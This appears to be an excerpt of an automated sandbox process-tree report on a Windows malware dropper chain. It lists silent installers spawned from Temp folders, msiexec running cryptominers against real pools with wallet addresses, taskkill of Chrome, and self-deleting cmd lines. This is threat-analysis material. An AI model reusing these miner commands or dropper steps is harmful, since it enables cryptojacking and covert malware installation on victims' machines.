        C:\Users\Admin\AppData\Roaming\9003.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9003.tmp.exe"
        18⤵
        
        PID:9164
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:8308
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:6984
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyonmmih.rpn\Four.exe & exit
        15⤵
        
        PID:7772
        
        C:\Users\Admin\AppData\Local\Temp\vyonmmih.rpn\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\vyonmmih.rpn\Four.exe
        16⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe" 1 3.1617398060.6067892c05412 104
        18⤵
        
        PID:7456
        
        C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe" 2 3.1617398060.6067892c05412
        19⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\tzvdtojt5ko\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tzvdtojt5ko\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:8068
        
        C:\Users\Admin\AppData\Local\Temp\0n4ddi00n4a\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0n4ddi00n4a\app.exe" /8-23
        20⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\3cgfa4khigp\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3cgfa4khigp\vpn.exe" /silent /subid=482
        20⤵
        
        PID:7308
        
        C:\Users\Admin\AppData\Local\Temp\is-DVRNP.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DVRNP.tmp\vpn.tmp" /SL5="$30752,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3cgfa4khigp\vpn.exe" /silent /subid=482
        21⤵
        
        PID:8272
        
        C:\Users\Admin\AppData\Local\Temp\3wslxpr24np\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3wslxpr24np\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:5344
        
        C:\Users\Admin\AppData\Local\Temp\is-85Q77.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-85Q77.tmp\vict.tmp" /SL5="$20748,870426,780800,C:\Users\Admin\AppData\Local\Temp\3wslxpr24np\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\ejp5pt3jzan\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ejp5pt3jzan\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:6168
        
        C:\Users\Admin\AppData\Local\Temp\is-UR4DL.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UR4DL.tmp\Setup3310.tmp" /SL5="$80426,138429,56832,C:\Users\Admin\AppData\Local\Temp\ejp5pt3jzan\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:8848
        
        C:\Users\Admin\AppData\Local\Temp\dv4a0evtawx\qfcxebiz22l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dv4a0evtawx\qfcxebiz22l.exe" /ustwo INSTALL
        20⤵
        
        PID:8364
        
        C:\Users\Admin\AppData\Local\Temp\8BGZ1KEJXL\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8BGZ1KEJXL\setups.exe" ll
        17⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\is-10US4.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-10US4.tmp\setups.tmp" /SL5="$30662,635399,250368,C:\Users\Admin\AppData\Local\Temp\8BGZ1KEJXL\setups.exe" ll
        18⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\9d-3fca5-d16-281b4-1d331208883c7\Vibaposaelo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9d-3fca5-d16-281b4-1d331208883c7\Vibaposaelo.exe"
        14⤵
        
        PID:6080
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\is-PHGJQ.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PHGJQ.tmp\lylal220.tmp" /SL5="$2032C,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        12⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\is-4TBN6.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-4TBN6.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:5900
        
        C:\Program Files\Windows Sidebar\OZXGVVXHPB\irecord.exe
        
        "C:\Program Files\Windows Sidebar\OZXGVVXHPB\irecord.exe" /VERYSILENT
        14⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\is-PFIHQ.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PFIHQ.tmp\irecord.tmp" /SL5="$2028C,6265333,408064,C:\Program Files\Windows Sidebar\OZXGVVXHPB\irecord.exe" /VERYSILENT
        15⤵
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\b0-a9944-46d-0cd8a-c1389d023973d\Doshufigogu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b0-a9944-46d-0cd8a-c1389d023973d\Doshufigogu.exe"
        14⤵
        
        PID:6008
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5mgl0gi.am4\md6_6ydj.exe & exit
        15⤵
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\v5mgl0gi.am4\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\v5mgl0gi.am4\md6_6ydj.exe
        16⤵
        
        PID:6844
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pllxjbcy.orh\askinstall31.exe & exit
        15⤵
        
        PID:6692
        
        C:\Users\Admin\AppData\Local\Temp\pllxjbcy.orh\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\pllxjbcy.orh\askinstall31.exe
        16⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:8004
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe & exit
        15⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe
        16⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe
        17⤵
        
        PID:7720
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1k5jxed.b3k\setup_10.2_mix.exe & exit
        15⤵
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\x1k5jxed.b3k\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\x1k5jxed.b3k\setup_10.2_mix.exe
        16⤵
        
        PID:4180
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uu4nsawc.uk3\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:7880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nbzz03up.1id\app.exe /8-2222 & exit
        15⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\nbzz03up.1id\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\nbzz03up.1id\app.exe /8-2222
        16⤵
        
        PID:6208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ogowhsc0.yb5\file.exe & exit
        15⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\ogowhsc0.yb5\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\ogowhsc0.yb5\file.exe
        16⤵
        
        PID:4276
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        17⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe" 1 3.1617398068.606789350040d 101
        19⤵
        
        PID:8908
        
        C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe" 2 3.1617398068.606789350040d
        20⤵
        
        PID:8904
        
        C:\Users\Admin\AppData\Local\Temp\9KU3YDEINZ\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9KU3YDEINZ\setups.exe" ll
        18⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\is-12IMJ.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-12IMJ.tmp\setups.tmp" /SL5="$20680,635399,250368,C:\Users\Admin\AppData\Local\Temp\9KU3YDEINZ\setups.exe" ll
        19⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        17⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        17⤵
        
        PID:4544
        
        C:\Users\Admin\AppData\Roaming\6057.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\6057.tmp.exe"
        18⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Roaming\6057.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\6057.tmp.exe"
        19⤵
        
        PID:8248
        
        C:\Users\Admin\AppData\Roaming\6D69.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\6D69.tmp.exe"
        18⤵
        
        PID:5468
        
        C:\Users\Admin\AppData\Roaming\6D58.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\6D58.tmp.exe"
        18⤵
        
        PID:4068
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:9044
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:8244
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        18⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:9080
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        17⤵
        
        PID:7200
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t3wd354g.npj\Four.exe & exit
        15⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\t3wd354g.npj\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\t3wd354g.npj\Four.exe
        16⤵
        
        PID:7648
        
        C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe" 1 3.1617398069.6067893575743 104
        18⤵
        
        PID:8936
        
        C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe" 2 3.1617398069.6067893575743
        19⤵
        
        PID:8880
        
        C:\Users\Admin\AppData\Local\Temp\PXCH9G3D9M\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PXCH9G3D9M\setups.exe" ll
        17⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\is-RVKSS.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RVKSS.tmp\setups.tmp" /SL5="$205B6,635399,250368,C:\Users\Admin\AppData\Local\Temp\PXCH9G3D9M\setups.exe" ll
        18⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\f6-ee80e-610-4a2a1-19f81e8bf31ad\Cizhaerimalu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f6-ee80e-610-4a2a1-19f81e8bf31ad\Cizhaerimalu.exe"
        14⤵
        
        PID:4616
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:5968
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"
        11⤵
        
        PID:4216
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:5788
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:6088
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        11⤵
        
        PID:3900
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        12⤵
        
        PID:6436
        
        C:\Users\Admin\Videos\lilal.exe
        
        "C:\Users\Admin\Videos\lilal.exe"
        13⤵
        
        PID:8040
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        14⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui
        14⤵
        
        PID:7684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        15⤵
        
        PID:7676
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6436 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        13⤵
        
        PID:1196
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 6436
        14⤵
        Kills process with taskkill
        
        PID:7480
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe" 1 3.1617397955.606788c3f1931 103
        13⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe" 2 3.1617397955.606788c3f1931
        14⤵
        
        PID:196
        
        C:\Users\Admin\AppData\Local\Temp\banqnzv2mag\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\banqnzv2mag\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Local\Temp\is-4HJP3.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4HJP3.tmp\Setup3310.tmp" /SL5="$602BA,138429,56832,C:\Users\Admin\AppData\Local\Temp\banqnzv2mag\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\is-P7V6L.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-P7V6L.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\v3v0fhuk4we\adwxkvm2rtf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\v3v0fhuk4we\adwxkvm2rtf.exe" /ustwo INSTALL
        15⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 652
        16⤵
        Program crash
        
        PID:6296
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 668
        16⤵
        Program crash
        
        PID:6220
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 672
        16⤵
        Program crash
        
        PID:7152
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 808
        16⤵
        Program crash
        
        PID:6236
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 904
        16⤵
        Program crash
        
        PID:7260
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 948
        16⤵
        Program crash
        
        PID:3500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 992
        16⤵
        Program crash
        
        PID:7264
        
        C:\Users\Admin\AppData\Local\Temp\tua3rbtctlh\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tua3rbtctlh\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:6300
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:6932
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        17⤵
        
        PID:8088
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        17⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:6336
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        17⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        17⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        18⤵
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\w5xfuljxnir\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\w5xfuljxnir\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\is-R0SAL.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R0SAL.tmp\vict.tmp" /SL5="$401FA,870426,780800,C:\Users\Admin\AppData\Local\Temp\w5xfuljxnir\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\is-FFGH8.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-FFGH8.tmp\win1host.exe" 535
        17⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\0lvlehjlwoz\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0lvlehjlwoz\app.exe" /8-23
        15⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\rybc1orb0xg\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rybc1orb0xg\vpn.exe" /silent /subid=482
        15⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\is-GV7GE.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GV7GE.tmp\vpn.tmp" /SL5="$203E2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\rybc1orb0xg\vpn.exe" /silent /subid=482
        16⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\LJPIVYYOKU\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LJPIVYYOKU\setups.exe" ll
        12⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\is-OLU78.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OLU78.tmp\setups.tmp" /SL5="$6035A,635399,250368,C:\Users\Admin\AppData\Local\Temp\LJPIVYYOKU\setups.exe" ll
        13⤵
        
        PID:4200
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:4744
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\p3nkujmzvh4\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p3nkujmzvh4\vpn.exe" /silent /subid=482
        8⤵
        
        PID:5352
        
        C:\Users\Admin\AppData\Local\Temp\is-3FTPI.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3FTPI.tmp\vpn.tmp" /SL5="$202A8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\p3nkujmzvh4\vpn.exe" /silent /subid=482
        9⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5548
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5808
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:4424
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Local\Temp\rnuu12jbrtp\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rnuu12jbrtp\app.exe" /8-23
        8⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\gsyk4uuzkem\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gsyk4uuzkem\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\is-4CDLA.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4CDLA.tmp\vict.tmp" /SL5="$70218,870426,780800,C:\Users\Admin\AppData\Local\Temp\gsyk4uuzkem\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\is-96993.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-96993.tmp\win1host.exe" 535
        10⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe"
        11⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe"
        12⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 568
        11⤵
        Program crash
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\a3z0uebtp4w\aspnt4vhqm0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a3z0uebtp4w\aspnt4vhqm0.exe"
        8⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\a3z0uebtp4w\aspnt4vhqm0.exe"
        9⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\elnnlzq4pem\4pgooth1hlp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\elnnlzq4pem\4pgooth1hlp.exe" /VERYSILENT
        8⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\is-DTKAI.tmp\4pgooth1hlp.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DTKAI.tmp\4pgooth1hlp.tmp" /SL5="$201F2,2592217,780800,C:\Users\Admin\AppData\Local\Temp\elnnlzq4pem\4pgooth1hlp.exe" /VERYSILENT
        9⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\is-84L3E.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-84L3E.tmp\winlthsth.exe"
        10⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe"
        11⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe"
        12⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\cmd.exe
        
